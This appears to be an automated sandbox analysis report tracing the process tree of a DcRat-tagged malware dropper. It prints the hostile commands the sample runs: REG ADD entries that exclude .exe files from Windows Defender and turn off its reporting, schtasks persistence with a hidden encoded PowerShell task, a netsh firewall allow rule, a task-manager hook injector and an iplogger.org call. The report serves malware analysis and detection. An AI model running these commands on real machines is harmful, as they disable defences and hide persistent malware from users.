4692 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Install.exe PID 2236 wrote to memory of 4692 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Install.exe PID 2236 wrote to memory of 4692 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Install.exe PID 2236 wrote to memory of 4888 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Files.exe PID 2236 wrote to memory of 4888 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Files.exe PID 2236 wrote to memory of 4888 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Files.exe PID 2236 wrote to memory of 4212 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe pub2.exe PID 2236 wrote to memory of 4212 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe pub2.exe PID 2236 wrote to memory of 4212 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe pub2.exe PID 2236 wrote to memory of 4436 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe File.exe PID 2236 wrote to memory of 4436 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe File.exe PID 2236 wrote to memory of 4436 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe File.exe PID 5044 wrote to memory of 1396 5044 Folder.exe Folder.exe PID 5044 wrote to memory of 1396 5044 Folder.exe Folder.exe PID 5044 wrote to memory of 1396 5044 Folder.exe Folder.exe PID 4888 wrote to memory of 2040 4888 Files.exe jfiag3g_gg.exe PID 4888 wrote to memory of 2040 4888 Files.exe jfiag3g_gg.exe PID 4888 wrote to memory of 2040 4888 Files.exe jfiag3g_gg.exe PID 4692 wrote to memory of 2168 4692 Install.exe cmd.exe PID 4692 wrote to memory of 2168 4692 Install.exe cmd.exe PID 4692 wrote to memory of 2168 4692 Install.exe cmd.exe PID 2168 wrote to memory of 3432 2168 cmd.exe taskkill.exe PID 2168 wrote to memory of 3432 2168 cmd.exe taskkill.exe PID 2168 wrote to memory of 3432 2168 cmd.exe taskkill.exe PID 4964 wrote to memory of 3568 4964 rUNdlL32.eXe rundll32.exe PID 4964 wrote to memory of 3568 4964 rUNdlL32.eXe rundll32.exe PID 4964 wrote to memory of 3568 4964 rUNdlL32.eXe rundll32.exe PID 4888 wrote to memory of 1176 4888 Files.exe jfiag3g_gg.exe PID 4888 wrote to memory of 1176 4888 Files.exe jfiag3g_gg.exe PID 4888 wrote to memory of 1176 4888 Files.exe jfiag3g_gg.exe PID 1864 wrote to memory of 4692 1864 svchost.exe Graphics.exe PID 1864 wrote to memory of 4692 1864 svchost.exe Graphics.exe PID 1864 wrote to memory of 4692 1864 svchost.exe Graphics.exe PID 4692 wrote to memory of 5000 4692 Graphics.exe cmd.exe PID 4692 wrote to memory of 5000 4692 Graphics.exe cmd.exe PID 5000 wrote to memory of 4216 5000 cmd.exe netsh.exe PID 5000 wrote to memory of 4216 5000 cmd.exe netsh.exe PID 4692 wrote to memory of 1568 4692 Graphics.exe csrss.exe PID 4692 wrote to memory of 1568 4692 Graphics.exe csrss.exe PID 4692 wrote to memory of 1568 4692 Graphics.exe csrss.exe PID 1864 wrote to memory of 2000 1864 svchost.exe schtasks.exe PID 1864 wrote to memory of 2000 1864 svchost.exe schtasks.exe PID 1568 wrote to memory of 1156 1568 csrss.exe injector.exe PID 1568 wrote to memory of 1156 1568 csrss.exe injector.exe PID 4436 wrote to memory of 1108 4436 File.exe qYP5ae8gJGzlVjaxvAfG2I8a.exe PID 4436 wrote to memory of 1108 4436 File.exe qYP5ae8gJGzlVjaxvAfG2I8a.exe PID 4436 wrote to memory of 2712 4436 File.exe exz_y5si_QKvgV12SHnOl8Vv.exe PID 4436 wrote to memory of 2712 4436 File.exe exz_y5si_QKvgV12SHnOl8Vv.exe PID 4436 wrote to memory of 2712 4436 File.exe exz_y5si_QKvgV12SHnOl8Vv.exe PID 4436 wrote to memory of 1440 4436 File.exe c_mukBcitiv6zGCSo47ynarP.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe"C:\Users\Admin\AppData\Local\Temp\607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe"1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Graphics.exe"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 3283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 3323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 3323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 5963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 6963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 6963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 7283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 7363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 7483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 7803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 8563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 7803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 8843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 7563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 8643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 7723⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 7683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 7683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 8523⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 8643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 6324⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 5963⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Graphics.exe"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"3⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 2924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 2964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 2964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 6364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 6364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 6364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 6364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 7084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 7284⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 7164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 5884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 7004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 8244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 8884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 7004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 8564⤵
- Program crash
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /202-2024⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 3285⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 3325⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 3285⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 6645⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 6645⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 6645⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 6645⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 7365⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 7565⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 6045⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 8765⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 7085⤵
- Program crash
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 7085⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 9045⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 9045⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 9365⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 10085⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 9805⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 9845⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 10285⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 10725⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 9725⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 9245⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 10565⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 9965⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 9685⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 11245⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 11565⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 10965⤵
-
C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\File.exe"C:\Users\Admin\AppData\Local\Temp\File.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\qYP5ae8gJGzlVjaxvAfG2I8a.exe"C:\Users\Admin\Pictures\Adobe Films\qYP5ae8gJGzlVjaxvAfG2I8a.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\FQpsZZfGz3m87Jl6jcWI9bSG.exe"C:\Users\Admin\Pictures\Adobe Films\FQpsZZfGz3m87Jl6jcWI9bSG.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im FQpsZZfGz3m87Jl6jcWI9bSG.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\FQpsZZfGz3m87Jl6jcWI9bSG.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im FQpsZZfGz3m87Jl6jcWI9bSG.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\O2asz6Aj0jmIxGOx8FZlN293.exe"C:\Users\Admin\Pictures\Adobe Films\O2asz6Aj0jmIxGOx8FZlN293.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Netdhcpsvc\77FTyD6gK21dfSGhRqsixY3e.vbe"4⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Netdhcpsvc\jGDslx6begqObyzNRSfaWpJOf.bat" "5⤵
-
C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe"C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe"6⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe"C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\c_mukBcitiv6zGCSo47ynarP.exe"C:\Users\Admin\Pictures\Adobe Films\c_mukBcitiv6zGCSo47ynarP.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\yXXvNULregFXMltBKmOl3yOn.exe"C:\Users\Admin\Documents\yXXvNULregFXMltBKmOl3yOn.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\9eijeUrJt5HFc5qUQ01Ar1rO.exe"C:\Users\Admin\Pictures\Adobe Films\9eijeUrJt5HFc5qUQ01Ar1rO.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\3QWDJbD9gA1edvmrqjw4wa7y.exe"C:\Users\Admin\Pictures\Adobe Films\3QWDJbD9gA1edvmrqjw4wa7y.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 6166⤵
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 6246⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 6566⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 8246⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 8046⤵
-
C:\Users\Admin\Pictures\Adobe Films\OGaewSexDdcUewGNh9MbzlbL.exe"C:\Users\Admin\Pictures\Adobe Films\OGaewSexDdcUewGNh9MbzlbL.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" .\a6U_WGm.9B6⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B7⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\a6U_WGm.9B8⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\a6U_WGm.9B9⤵
-
C:\Users\Admin\Pictures\Adobe Films\Ez3PxgX8W6KbcsaZX7zmFHWY.exe"C:\Users\Admin\Pictures\Adobe Films\Ez3PxgX8W6KbcsaZX7zmFHWY.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\LVScHASJYvW4eC6e8OuZpyLG.exe"C:\Users\Admin\Pictures\Adobe Films\LVScHASJYvW4eC6e8OuZpyLG.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS967C.tmp\Install.exe.\Install.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC26E.tmp\Install.exe.\Install.exe /S /site_id "525403"7⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&9⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3210⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6410⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&9⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3210⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6410⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghbixFBUP" /SC once /ST 03:56:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="8⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghbixFBUP"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghbixFBUP"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 12:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\vOMCCJB.exe\" j6 /site_id 525403 /S" /V1 /F8⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\SqxEUWFAHrHCWdtUp5Jt44Jq.exe"C:\Users\Admin\Pictures\Adobe Films\SqxEUWFAHrHCWdtUp5Jt44Jq.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 3406⤵
-
C:\Users\Admin\Pictures\Adobe Films\Ts54Y9demDiqwyFRX9XtsPd2.exe"C:\Users\Admin\Pictures\Adobe Films\Ts54Y9demDiqwyFRX9XtsPd2.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\E1L2G.exe"C:\Users\Admin\AppData\Local\Temp\E1L2G.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\D6JFM.exe"C:\Users\Admin\AppData\Local\Temp\D6JFM.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\BLEC3.exe"C:\Users\Admin\AppData\Local\Temp\BLEC3.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\9EAF7.exe"C:\Users\Admin\AppData\Local\Temp\9EAF7.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\77DIC.exe"C:\Users\Admin\AppData\Local\Temp\77DIC.exe"7⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" -u /S .\n7PM.r6S8⤵
-
C:\Users\Admin\AppData\Local\Temp\77DICLD41JBJKCH.exehttps://iplogger.org/1OAvJ7⤵
-
C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall23410.exe"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall23410.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\afcedbff-f54c-4cd7-840d-c2045834bc66.exe"C:\Users\Admin\AppData\Local\Temp\afcedbff-f54c-4cd7-840d-c2045834bc66.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\po50.exe"C:\Users\Admin\AppData\Local\Temp\po50.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\binwang.exe"C:\Users\Admin\AppData\Local\Temp\binwang.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\binwang.exe"C:\Users\Admin\AppData\Local\Temp\binwang.exe" -h7⤵
-
C:\Users\Admin\AppData\Local\Temp\tvstream17.exe"C:\Users\Admin\AppData\Local\Temp\tvstream17.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\database.exe"C:\Users\Admin\AppData\Local\Temp\database.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\jg1_1faf.exe"C:\Users\Admin\AppData\Local\Temp\jg1_1faf.exe"6⤵
-
